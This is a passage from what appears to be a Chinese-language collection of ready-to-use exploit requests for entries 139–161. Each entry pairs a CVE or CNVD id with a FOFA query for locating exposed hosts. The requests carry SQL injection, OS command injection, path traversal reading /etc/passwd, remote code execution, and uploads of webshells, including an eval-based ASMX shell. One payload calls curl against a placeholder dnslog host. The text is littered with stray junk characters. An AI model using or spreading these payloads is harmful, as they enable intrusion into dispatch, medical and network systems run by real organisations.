Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
. i9 J3 {! Y9 V- o' XAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
8 y3 Z- G( g0 v) a% M- }Accept-Encoding: gzip, deflate, br3 k, f! Y9 S. e b3 \0 I: G
Connection: close- }3 U: u5 s2 S; g0 \
Upgrade-Insecure-Requests: 1
Z7 P7 E0 E" L; Q7 q+ Y, @/ \% x @# X8 N4 `$ e: |
8 H! w7 o) M, k a- q9 Q) }, o" H139. 福建科立讯通信指挥调度平台editemedia.php sql注入$ n0 R8 m, V \
CVE-2024-2622
% |: u) N% {7 J. I, K: k# PFOFA:body="app/structure/departments.php" || app="指挥调度管理平台"
, p+ ~7 {+ |1 n5 K& x! oGET /api/client/editemedia.php?enterprise_uuid=1%27%20AND%20(SELECT%203257%20FROM%20(SELECT(SLEEP(5)))JPVs)%20AND%20%27gDyM%27=%27gDyM HTTP/1.1
6 d; O7 k6 K: E' e0 U5 EHost: x.x.x.x
3 m' t3 n! p, \. y+ e/ C* y! C- _User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0, W" i" V5 n; V+ c3 o, k- n" G9 M
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.89 [6 s- f. S7 t5 u1 C' {
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
& ?6 ]6 C. p- K1 `6 h) m* EAccept-Encoding: gzip, deflate, br3 E3 p! J+ q7 ]: W( r' j3 y$ e( P& k# Y
Connection: close% L- t$ B% f; g& p5 }9 v
Cookie: PHPSESSID=d62411cd4ada228583bbcae45f099567; authcode=cybk
: k$ b. n- R- m+ |Upgrade-Insecure-Requests: 1
, S( N3 Q+ l! x: c. M* \! s2 {& n1 y; c' x1 \8 J1 O
4 G' e$ a' r: @% N( G3 R! F, V140. 福建科立讯通信指挥调度平台get_extension_yl.php sql注入8 g$ f2 H3 x" i5 H+ o( k
CVE-2024-2566
! v9 T2 H& \$ R# }) W9 d! lFOFA:body="app/structure/departments.php" || app="指挥调度管理平台"( h; K g5 Y- v* o" D' O4 Q
GET /api/client/get_extension_yl.php?imei=1%27%20AND%20(SELECT%207545%20FROM%20(SELECT(SLEEP(5)))Zjzw)%20AND%20%27czva%27=%27czva×tamp=1&sign=1 HTTP/1.1 A* }1 o7 j: q8 f" I
Host: x.x.x.x5 z. M" N$ t7 ~7 S
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0, T( ~! b! _% }" E4 W1 o
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.82 |+ b7 h6 ~, @
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2; ~1 p: S, y) ~5 r% X1 ~
Accept-Encoding: gzip, deflate, br
/ e+ L- j3 p% l- b5 o g; A! HConnection: close
% e$ y2 @' t8 n, h* B' ?3 vCookie: authcode=h8g9
7 T/ Q4 t9 p }3 C0 _% r* m6 _) aUpgrade-Insecure-Requests: 1, W1 [% p+ k8 @1 a6 Z# Q( X
8 g# _4 a7 S9 t( u, G9 W7 F3 R4 o. m; u+ j2 f
141. 建科立讯通信指挥调度管理平台 ajax_users.php SQL注入' k. r/ z: u' R4 |: c
FOFA:body="指挥调度管理平台"
: j5 E: J( O! X C2 c2 IPOST /app/ext/ajax_users.php HTTP/1.1
N7 h# g0 P+ E- B9 V6 Z& l yHost: your-ip: g7 k0 o$ f, Z) H
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0 info
% C; Q( n/ v& _: f/ o& D; UContent-Type: application/x-www-form-urlencoded
/ [. ^) B: Q" U; ?3 \: ]' y
) ~3 H$ @2 N' V5 k
3 I* k, ^) n1 _/ [) T8 wdep_level=1') UNION ALL SELECT NULL,CONCAT(0x7e,md5(1),0x7e),NULL,NULL,NULL-- -
( K g! B# F! i J/ ]% S9 B3 K+ @$ W1 c% C7 a
3 D8 I: D0 v8 Y$ A* Q( L, p
142. CMSV6车辆监控平台系统中存在弱密码+ W1 [: g# u- x" I
CVE-2024-296667 ]8 p2 p' |: @: _
FOFA:body="/808gps/"2 P' S. J* b3 j7 Z5 h6 n
admin/admin+ `3 X2 F1 g0 q
143. Netis WF2780 v2.1.40144 远程命令执行
; _7 P9 q9 ^- i/ i, U7 x, JCVE-2024-258508 s' S) z2 v R. n: |( p. o
FOFA:title='AP setup' && header='netis'4 {: t. ]+ u3 v- _ z& y
PAYLOAD. B7 f' j0 \) z9 U/ x* A3 }% G3 B6 _
- o6 z5 ?( ^5 Z# m9 w
144. D-Link nas_sharing.cgi 命令注入' Y3 V- x) L; I, S
FOFA:app="D_Link-DNS-ShareCenter"
/ B' q7 \2 i. ^8 L- s, n+ Ysystem参数用于传要执行的命令& X9 o7 r$ l. ~, N
GET /cgi-bin/nas_sharing.cgi?user=mydlinkBRionyg&passwd=YWJjMTIzNDVjYmE&cmd=15&system=aWQ= HTTP/1.1
4 I6 r; f/ K5 M6 l1 x% w7 X' ?Host: x.x.x.x
) S, f0 p7 O7 o, [8 k0 qUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0
! D6 k5 `2 b$ aConnection: close. x/ @" W0 J# B2 X: Q
Accept: */*$ q; C) `0 p$ p- A
Accept-Language: en+ ~( V( n( f) ^) D' Q
Accept-Encoding: gzip
, _! r! T# K9 q0 `" e3 M+ C/ C# h7 j" F0 Z2 f! h6 h2 \
2 D& ^/ u. e. O
145. Palo Alto Networks PAN-OS GlobalProtect 命令注入! ~# i& F, w0 N( K' N
CVE-2024-34004 O! L. K& z0 K6 Q( i
FOFA:icon_hash="-631559155": O5 J1 i6 B2 S- I d! N9 x4 r s
GET /global-protect/login.esp HTTP/1.15 L) S/ f; H- C/ b0 R& c$ E9 e
Host: 192.168.30.112:10051 g; a% a; V# a" H0 P5 v
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36 Edg/92.0.902.84. f1 q* O! S! C' \9 D7 R3 g/ a, X
Connection: close
& p4 \3 c$ U, P7 a: L8 [) XCookie: SESSID=/../../../opt/panlogs/tmp/device_telemetry/minute/hellothere226`curl${IFS}dnslog地址`;
; a8 e) l6 t2 c. u( RAccept-Encoding: gzip8 v& b( g7 g. i$ ^9 }
, H) e2 F; i8 e4 E$ K* v7 |3 N
- d) W% |/ C. S M! U# R146. MajorDoMo thumb.php 未授权远程代码执行
/ D8 p6 U# c" S1 ICNVD-2024-02175
+ K- v& N# H2 S- dFOFA:app="MajordomoSL"0 X3 A$ d6 q9 C W; A8 E
GET /modules/thumb/thumb.php?url=cnRzcDovL2EK&debug=1&transport=%7C%7C+%28echo+%27%5BS%5D%27%3B+id%3B+echo+%27%5BE%5D%27%29%23%3B HTTP/1.1
: R2 [) o6 Q; X. c, `! h% v. kHost: x.x.x.x) F3 m6 M5 S! A- _% E
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36 Edg/92.0.902.84
( `) h% H, y2 b' N* O1 Y( i- T$ x3 {Accept-Charset: utf-8
1 S" }2 D6 K3 z7 `7 rAccept-Encoding: gzip, deflate) _9 _) F. y( I/ q
Connection: close9 J* x- f% }7 J/ n3 L9 w
# c4 @1 J F( M& g
! A5 f G5 G9 H147. RaidenMAILD邮件服务器v.4.9.4-路径遍历
4 h; r( D' s8 a+ sCVE-2024-32399
3 S' r1 G# B! p0 B: iFOFA:body="RaidenMAILD"
$ ?: {/ p x' U3 l1 KGET /webeditor/../../../windows/win.ini HTTP/1.11 B: P3 W# Q7 c7 U. L
Host: 127.0.0.1:81$ U( V# l# H, {" |
Cache-Control: max-age=0
2 U% K: [7 J% Y: D1 hConnection: close
* a# Z9 {9 o5 v L+ b6 D0 t' o2 U- a( Y% W7 k. i& o
: h; u: a" T. ], J148. CrushFTP 认证绕过模板注入
' E5 p# l& ~% S( }7 WCVE-2024-4040# y! d/ G2 \( ~4 S. j5 n
FOFA:body="CrushFTP"1 b: h9 p7 u' \/ g; v
PAYLOAD
1 l1 \; c: B* r3 W1 t, v6 u- ]8 V( L5 ?) ^
149. AJ-Report开源数据大屏存在远程命令执行+ N/ e3 o. l2 T5 C5 k
FOFA:title="AJ-Report"
; Z2 m4 U1 k- k' c: H. `3 p; _+ I4 P( r
POST /dataSetParam/verification;swagger-ui/ HTTP/1.1: ~% T8 Q+ Y/ z5 k
Host: x.x.x.x
. e: t. c6 X' C7 MUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
9 p* `% S* K5 ~% W: ~( L$ QAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
& v; T9 m/ [; U' u+ RAccept-Encoding: gzip, deflate, br
" b" ]5 i4 Y7 n& A% F6 h3 f. xAccept-Language: zh-CN,zh;q=0.9
i( B- g6 [- cContent-Type: application/json;charset=UTF-8# M4 E; e8 C* @1 F* o
Connection: close9 ~' f/ o- X- E9 O
$ t$ G: R) H3 X! U$ G9 \, h& `{"ParamName":"","paramDesc":"","paramType":"","sampleItem":"1","mandatory":true,"requiredFlag":1,"validationRules":"function verification(data){a = new java.lang.ProcessBuilder(\"ipconfig\").start().getInputStream();r=new java.io.BufferedReader(new java.io.InputStreamReader(a));ss='';while((line = r.readLine()) != null){ss+=line};return ss;}"}( m/ [/ w J5 o- M4 y& }4 R) |/ E
9 ?* j! X+ f/ |150. AJ-Report 1.4.0 认证绕过与远程代码执行 }; [/ Y0 Q) \
FOFA:title="AJ-Report"
5 s" b! A/ m/ ~/ O: sPOST /dataSetParam/verification;swagger-ui/ HTTP/1.1
1 U, W; z G; E$ j8 L AHost: x.x.x.x% f8 @& _: T. D+ i3 G
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36# @* U* [1 {* O+ x8 r
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7/ R8 o) \! Q, z' b$ D' x& D
Accept-Encoding: gzip, deflate, br
( G) q: b1 T0 o+ qAccept-Language: zh-CN,zh;q=0.96 Y1 M5 a) p+ V8 b- @9 Y
Content-Type: application/json;charset=UTF-8
: U1 @( [* z* p8 I. SConnection: close* m; P7 _6 {( o) O2 l) E
Content-Length: 3397 ?8 k2 D+ R$ c& y! S
; {& Y1 \. A& H1 ?1 ]/ o
{"ParamName":"","paramDesc":"","paramType":"","sampleItem":"1","mandatory":true,"requiredFlag":1,"validationRules":"function verification(data){a = new java.lang.ProcessBuilder(\"id\").start().getInputStream();r=new java.io.BufferedReader(new java.io.InputStreamReader(a));ss='';while((line = r.readLine()) != null){ss+=line};return ss;}"}2 v7 ~& J* K& Y g$ t1 X7 Y
- V+ K; i% I1 m S
: I% i1 G8 h; s: j, Z151. AJ-Report 1.4.1 pageList sql注入
) i" x. {. T. O5 I2 WFOFA:title="AJ-Report"4 J# I5 ^$ W2 b0 [5 o2 E
GET /;swagger-ui/dataSource/pageList?showMoreSearch=false&pageNumber=1&pageSize=10 HTTP/1.1, j! g- p6 c7 h0 F* M# F
Host: x.x.x.x% ^9 Q( H1 i' h. {8 c
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
* V7 l' c% o% ]* ?/ R( eConnection: close. ?' ^+ p. k& |7 c
Accept-Encoding: gzip
; Y, d9 ]" I, w6 V* B& e5 f9 s# I# U8 R) p
- _( @4 ~% J* O
152. Progress Kemp LoadMaster 远程命令执行
1 v8 m4 S9 f3 p! W8 lCVE-2024-1212! I' v" ]( W5 V) O4 v- F
LoadMaster <= 7.2.59.2 (GA)# a0 `5 ~: B% S, f6 R
LoadMaster<=7.2.54.8 (LTSF). n8 o4 Y' M, p- z2 m n$ ?
LoadMaster <= 7.2.48.10 (LTS)
& \# R& }% m/ L3 l- K7 b) wFOFA:body="LoadMaster"" o! B9 [, F9 g! |! `
JztsczsnOmRvZXNub3RtYXR0ZXI=是';ls;':doesnotmatter的base64编码
# p! x7 [. `0 k. C' x% R) z& zGET /access/set?param=enableapi&value=1 HTTP/1.1* k* b: f/ _, o0 I) K0 i$ ]
Host: x.x.x.x. L" ^2 Z+ e/ T
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_0) AppleWebKit/604.1 (KHTML, like Gecko) Version/9.1.2 Safari/604.15 u; Z% E: X7 E
Connection: close
. T2 ]! z ^; ? Q' v& c6 A+ U1 dAccept: */*4 @% f$ W4 }( {1 i
Accept-Language: en
& Q0 t6 r+ t# T# z7 P* UAuthorization: Basic JztsczsnOmRvZXNub3RtYXR0ZXI=) k" V% P: P! k6 `: D" {; ~7 y2 \
Accept-Encoding: gzip1 C9 Y4 F! I3 v( @
& G) U1 c. R) u# _+ m% _
4 J' s9 X, `* M) C3 N153. gradio任意文件读取 X" Q% {) @2 X) [: ~1 W3 Y
CVE-2024-1561FOFA:body="__gradio_mode__"" y1 k# T9 P5 M8 c! }6 c; [) S: |
第一步,请求/config文件获取componets的id
: T+ o* b% F; A7 c& u" i1 J+ a/ Nhttp://x.x.x.x/config7 P# B3 U C4 f' G- ~9 f Z
+ |# W& O5 z' g+ Y Q0 w: @" @; i
9 U8 X2 y2 n' a' \/ S* O9 f) O) a" C
第二步,将/etc/passwd的内容写入到一个临时文件4 G" u! J; r+ e% q$ b7 L' M+ a
POST /component_server HTTP/1.16 e8 l# M8 f. H/ x$ w8 }" S
Host: x.x.x.x6 c! a3 @4 x6 T6 ]4 o4 c
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.1.3 Safari/605.1.1514.1.3 Ddg/14.1.3
& V8 l: e, k% m. g& GConnection: close
5 X" X1 r; A1 H1 j4 G; G% I K+ ZContent-Length: 115 L3 i9 m" |& O* j ?1 S' }, @/ n: Q
Content-Type: application/json$ h( {; }% S6 J# E0 N
Accept-Encoding: gzip
1 ]- I; ?, z# f8 t' r3 i6 n6 X: F1 B4 o2 v% b$ A
{"component_id": "1","data": "/etc/passwd","fn_name": "move_resource_to_block_cache","session_hash": "aaaaaaaaaaa"}) v3 l' r' I* p
- U3 D+ f2 {8 A: V5 U( h5 m/ N0 _. w& p. c* _
第三步访问
a' X8 z1 H6 y3 D% xhttp://x.x.x.x/file=/tmp/gradio/ ... 8cdf49755073/passwd
5 I. _5 Z5 n0 {' L3 r* F: H( Q, |" X7 C# A* D
; M$ a/ Q+ D% W9 k- V4 H8 x8 {! p/ d154. 天维尔消防救援作战调度平台 SQL注入& j$ A5 ?8 u2 v
CVE-2024-3720FOFA:body="天维尔信息科技股份有限公司" && title=="登入") a$ t7 d, D* S# p5 \$ z" U
POST /twms-service-mfs/mfsNotice/page HTTP/1.11 z; ?# U9 g7 ]* R; A' L
Host: x.x.x.x
9 R$ y) f( N: V* `" s. P4 W5 {3 _$ `Content-Length: 106
/ f2 I$ C+ d. w' M, t+ DCache-Control: max-age=09 ?6 ~ n% U/ {: i8 n
Upgrade-Insecure-Requests: 1' f! Z; V9 i7 L9 t4 v" M! U. m
Origin: http://x.x.x.x
& l5 [) |* ^$ C5 c* tContent-Type: application/json
0 A' p" z5 ^0 ZUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36
2 F- C9 x9 _0 ?7 L1 ~4 h: \) IAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
4 w+ v# u/ s0 M/ X! K7 M6 S4 vReferer: http://x.x.x.x/twms-service-mfs/mfsNotice/page
0 \1 A6 O2 H5 S$ N3 uAccept-Encoding: gzip, deflate, {- j+ `/ |- e8 o; ~( z" e
Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7$ ^8 s6 V' F7 J! S# i
Connection: close
l- ~1 U2 Y/ _, x, O0 W1 [
5 D3 k- s) Y" r$ W9 [{"currentPage":1,"pageSize":19,"query":{"gsdwid":"1f95b3ec41464ee8b8f223cc41847930') AND 7120=(SELECT 7120 FROM PG_SLEEP(5)) AND ('dZAi'='dZAi"},"hgubmt748n4":"="}) t" ^# x! L+ D! A
- ]3 j4 o7 _9 Z& D/ f& \- R) N4 ?1 `; ?
155. 六零导航页 file.php 任意文件上传- Y0 r3 H7 Z4 V [ |* m* E8 H2 P
CVE-2024-34982( G- Y# P8 U' f0 z" z
FOFA:title=="上网导航 - LyLme Spage"+ K$ z2 @) Y/ X% J- T* ~- l
POST /include/file.php HTTP/1.1, Q" {4 T1 q0 F
Host: x.x.x.x
$ L) [+ g% t. ^6 a% P/ sUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
6 x* l# G2 D( JConnection: close
4 a8 h/ v3 P) @" jContent-Length: 232% C& h4 \8 b& W7 A: e8 L0 q
Accept: application/json, text/javascript, */*; q=0.010 L" m) C( \& P5 K( d- @
Accept-Encoding: gzip, deflate, br
5 M6 t$ a% R3 W' N3 |8 \Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
; W4 e/ q# Y) S/ [3 @Content-Type: multipart/form-data; boundary=---------------------------qttl7vemrsold314zg0f" }1 q8 m0 ]) e" ?
X-Requested-With: XMLHttpRequest, o& I) I( c* r2 d) ?
: x" e9 o2 G: r, F
-----------------------------qttl7vemrsold314zg0f
0 Q4 K5 N9 @2 M# r0 @Content-Disposition: form-data; name="file"; filename="test.php"+ L, Y) b; Z( f- ^
Content-Type: image/png
! h+ R% H f+ U- f5 L) s* X9 i2 s; Z
<?php phpinfo();unlink(__FILE__);?>+ Y2 c& _& R7 _, q+ A& Q( j/ v2 o$ D% B
-----------------------------qttl7vemrsold314zg0f--' J+ w. U! D. F
0 ]' ]2 W% ~3 f2 \1 E1 F3 a- N# ~; e+ M3 I
访问回显文件http://x.x.x.x/files/upload/img_664ab7fd14d2c.php
d$ P1 N- P+ K- |* a$ |3 }3 |) j
156. TBK DVR-4104/DVR-4216 操作系统命令注入
0 S- k/ y! ?4 [6 wCVE-2024-3721
2 T H0 K2 r$ z, w+ v7 a6 AFOFA:"Location: /login.rsp"
0 P7 M, Z6 w% n9 }+ M·TBK DVR-4104
8 s A$ F3 w; V5 }; V·TBK DVR-4216
8 V3 a8 Y) ?* I/ Y: R# Hcurl "http://<dvr_host>:<port>/device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=<URL_ENCODED_SHELL_COMMAND>" -H "Cookie: uid=1"
+ @6 C/ e! J1 A9 @' J( M
& m! k( a- x1 v- M4 j9 n* k0 P7 l& Y0 ]
POST /device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=echo%3B%20echo%20asrgkjh0%20%3E%20%2Fvar%2Fexample.txt%3B%20ls%20-l%20%2Fvar%3B%20echo%20----------------%3B%20cat%20%2Fvar%2Fexample.txt%3B HTTP/1.1
: R# A0 |( F/ J: UHost: x.x.x.x
7 |* d p1 [: f- G0 jUser-Agent: Mozilla/5.0 (Macintosh;T2lkQm95X0c= Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.151 Z y. E3 @' l9 d. `, b; e( X! H, @( p
Connection: close
; i) n0 Z0 Q, X8 Y; A$ R& v1 J9 j8 sContent-Length: 0
$ A: V3 v" y. H& Q7 U& s- \Cookie: uid=1
/ Q5 a8 @8 h& ~4 R3 F. F; r: PAccept-Encoding: gzip( {+ J2 w" }" N' ^9 G2 ~5 U& E
; }: j" q# d% r- i6 s" A/ v1 d( E3 `$ h* C) M
157. 美特CRM upload.jsp 任意文件上传
1 s0 R* j6 H( V4 B( z) s, fCNVD-2023-06971
7 H5 H& \6 j, f% i# N8 O. T; o: VFOFA:body="/common/scripts/basic.js"! T& X0 v* H$ A' x8 Q; F
POST /develop/systparam/softlogo/upload.jsp?key=null&form=null&field=null&filetitle=null&folder=null HTTP/1.1
% ?& {2 ^9 S4 Y. D6 Y0 w& p* D# EHost: x.x.x.x
# u: q, Y# z7 p [: v7 uUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.364 T4 D, X! D: f; S
Content-Length: 7095 Z" J! z& B1 s
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7: \, i2 B% k7 `8 Y
Accept-Encoding: gzip, deflate
+ N! x, K U, uAccept-Language: zh-CN,zh;q=0.9
, [% k0 }: V8 p; e6 w3 m0 p1 T DCache-Control: max-age=08 R; R$ ^* s, v5 Y
Connection: close( ]: \8 ~5 j8 g! |* Y
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary1imovELzPsfzp5dN' C$ l0 ]4 ~& [2 z' f
Upgrade-Insecure-Requests: 1( F" W9 _" n9 @6 e* c
$ g9 U: j6 I8 Q3 a8 b0 k------WebKitFormBoundary1imovELzPsfzp5dN0 ?" w& X" U ~+ Y1 E
Content-Disposition: form-data; name="file"; filename="kjldycpvjrm.jsp"0 k2 e5 o% \' c& [; |
Content-Type: application/octet-stream" y/ M6 r" ~2 E. Q% v
" z- h' t+ E, n/ Znyhelxrutzwhrsvsrafb
/ x: l4 C# X; O4 v- P$ i------WebKitFormBoundary1imovELzPsfzp5dN* |( m. y& b4 b* c
Content-Disposition: form-data; name="key"
, G7 z( G' {3 Y9 d6 y1 w! A( e
+ z$ }& Y( J$ e0 V$ |/ l5 t# Vnull
+ x/ S) n) [9 f------WebKitFormBoundary1imovELzPsfzp5dN1 M& n' C& q7 Z- {; t! u
Content-Disposition: form-data; name="form"
; M" h6 N9 w% Y3 z v. C1 e( x. D
3 z$ l. u# w6 D% T3 f$ Dnull- E7 Z r! y: B
------WebKitFormBoundary1imovELzPsfzp5dN0 d# @" W( A7 F" F3 ~/ X
Content-Disposition: form-data; name="field"
, [6 H- ]; \+ d- z7 A
b* b0 w& R" H, `0 unull* L4 r( ~* L6 K
------WebKitFormBoundary1imovELzPsfzp5dN I6 k- Q |& |" j
Content-Disposition: form-data; name="filetitile"6 m8 ^! N4 S9 b2 w+ T* a
, u+ x& b$ l2 p! N+ `) S# _8 T% `null
K2 h1 v/ Y$ H3 u9 I6 T ?& {------WebKitFormBoundary1imovELzPsfzp5dN) f m, G" \+ c% t, _
Content-Disposition: form-data; name="filefolder"" e* R) @7 v$ k
+ f0 ?# E1 ]: v% h, @) R& c9 E4 x$ Dnull9 E7 J( F1 y5 v, X
------WebKitFormBoundary1imovELzPsfzp5dN--0 M2 W3 p' t; Y: |" Q- c- E& V
& s. ?! a; X0 w6 Q
* Z6 a' _9 G- v/ k( A" Qhttp://x.x.x.x/userfile/default/userlogo/kjldycpvjrm.jsp
n' Z5 h* n0 f- T0 t$ t9 v1 z! ?- d8 N: u
158. Mura-CMS-processAsyncObject存在SQL注入! }. @. g$ x, j$ A
CVE-2024-32640& {, L5 ~4 W0 T/ |
FOFA:"Generator: Masa CMS"
. `- P! Y8 |# H: w% H3 k4 zPOST /index.cfm/_api/json/v1/default/?method=processAsyncObject HTTP/1.1
" Q; y% P# z1 x# E9 o( kHost: {{Hostname}}1 E* n7 p+ W- L) w4 |3 X# n
Content-Type: application/x-www-form-urlencoded
4 Y. X) `3 u& s
4 M: W4 g. o+ J1 Z* m h1 @6 b+ ~ G7 x$ Zobject=displayregion&contenthistid=x\'&previewid=14 B; X5 i- x( |/ h. K- g. p
8 s* U" g3 u4 Q$ A* e. U2 B+ l/ W
/ ]- C2 w5 ]- M$ P% n7 G; e
159. 英飞达医学影像存档与通信系统 WebJobUpload任意文件上传2 N2 @) D, ~, |9 k
FOFA:"INFINITT" && (icon_hash="1474455751"|| icon_hash="702238928")1 G! l' o: e! k" t" @& g/ u
POST /webservices/WebJobUpload.asmx HTTP/1.1% L; T9 J! B0 D- d
Host: x.x.x.x. Y6 r# Q% H3 @3 @: A& }
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36; \ a6 L. z6 i0 z; _/ k& o* w1 H. ^( f
Content-Length: 1080
5 g- Z' }: U8 Y& w9 P2 ZAccept-Encoding: gzip, deflate
; r" t) ]% Z$ V. l& H8 J5 dConnection: close0 u8 }" c9 Y# l2 d- F7 t) u& ^
Content-Type: text/xml; charset=utf-8: @* ]% U/ p6 @ h8 {8 l1 ?
Soapaction: "http://rainier/jobUpload"
; J' U: G' }" A' p& H3 t
+ O. D- l4 `- O: T; l& \<?xml version="1.0" encoding="utf-8"?>4 B, t+ M8 `1 W, Y5 q
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">+ x) h B9 q7 F( _4 o
<soap:Body>
: U) m5 N3 b+ g3 M<jobUpload xmlns="http://rainier">
. ^. e, {9 S% b5 l/ M( `<vcode>1</vcode>
; x" Y3 F9 F, i' a/ j% S. v<subFolder></subFolder>1 j6 E6 B' V) G+ ^ T1 P
<fileName>abcrce.asmx</fileName>
- [. K; ~+ c8 u f6 c" b1 W<bufValue>PCVAIFdlYlNlcnZpY2UgTGFuZ3VhZ2U9IkpTY3JpcHQiIENsYXNzPSJXZWJTZXJ2aWNlMSIgJT4KIAppbXBvcnQgU3lzdGVtO2ltcG9ydCBTeXN0ZW0uV2ViO2ltcG9ydCBTeXN0ZW0uSU87aW1wb3J0IFN5c3RlbS5XZWIuU2VydmljZXM7CmltcG9ydCBTeXN0ZW0uV2ViLlNjcmlwdC5TZXJ2aWNlczsKaW1wb3J0IFN5c3RlbS5XZWI7CmltcG9ydCBTeXN0ZW0uV2ViLlNlcnZpY2VzOwogCnB1YmxpYyBjbGFzcyBXZWJTZXJ2aWNlMSBlleHRlbmRzIFdlYlNlcnZpY2UKewogCldlYk1ldGhvZEF0dHJpYnV0ZSBTY3JpcHRNZXRob2RBdHRyaWJ1dGUgZnVuY3Rpb24gQ21kc2hlbGwoUGFzcyA6IFN0cmluZykgOiBWb2lkCiAgICB7CiAgICAgICAgICAgIHZhciBjIID0gSHR0cENvbnRleHQuQ3VycmVudDsKICAgICAgICAgICAgdmFyIFJlcXVlc3QgPSBjLlJlcXVlc3Q7CiAgICAgICAgICAgIHZhciBSZXNwb25zZSA9IGMuUmVzcG9uc2U7CiAgICAgICAgICAgIGV2YWwoUGFzcyk7CiAgICCB9Cn0=</bufValue>
: [- J4 n, \: u$ ?+ C</jobUpload>/ L3 ^: t7 c* G
</soap:Body>
. M* b- e( n6 V, ?( W9 {: U8 Z7 b0 \</soap:Envelope>0 ?; e5 V$ u+ Z% C$ e
/ G n6 q2 y8 \& j9 C
. w; @* x: Z2 [) Y) y+ G/1/abcrce.asmx/Cmdshell?Pass=Response.Write("Hello,World")8 D) F8 y5 c7 q* i7 r: H( U( `
% n. l7 e" Q7 y# m! c7 W
2 N$ A. f, x( ?' r) `' Z) g& z1 Z160. Sonatype Nexus Repository 3目录遍历与文件读取: y+ p: s9 G' r+ { s
CVE-2024-49560 ]. X! D: O$ H8 Q" t! n
FOFA:title="Nexus Repository Manager"
/ {7 T! b8 k3 M, b% B# n8 Z" AGET /%2F%2F%2F%2F%2F%2F%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1 o0 F, J4 {5 [* Z2 O
Host: x.x.x.x
% j; \* m' C. Y* u C% QUser-Agent: Mozilla/5.0 (Windows NT 5.1; rv:21.0) Gecko/20100101 Firefox/21.01 `- c( H* u# }, o6 {$ N0 i5 B! F
Connection: close, C) D+ t* Z# {- H6 c+ W
Accept: */*
0 y% G& ]3 E# y: F; ?Accept-Language: en# Y0 n. P0 b- G2 E0 s
Accept-Encoding: gzip
, x' }+ E1 D; B+ O" x
$ K4 c4 e5 [- C
) y R: N( R4 |1 t161. 科拓全智能停车收费系统 Webservice.asmx 任意文件上传
& r/ l- `# |. ?0 m* xFOFA:body="/KT_Css/qd_defaul.css") r( D+ Z+ { s; D0 G& Y
第一步,上传文件<fileName>字段指定文件名,<fileFlow>字段指定文件内容,内容需要base64加密: u+ {6 x: \7 c* z: U
POST /Webservice.asmx HTTP/1.10 s7 x! v( r" Y
Host: x.x.x.x
/ {0 _/ X @: s$ V* G5 `User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.5249.62 Safari/537.36
) S. I% p, ?. h2 r9 E: GConnection: close
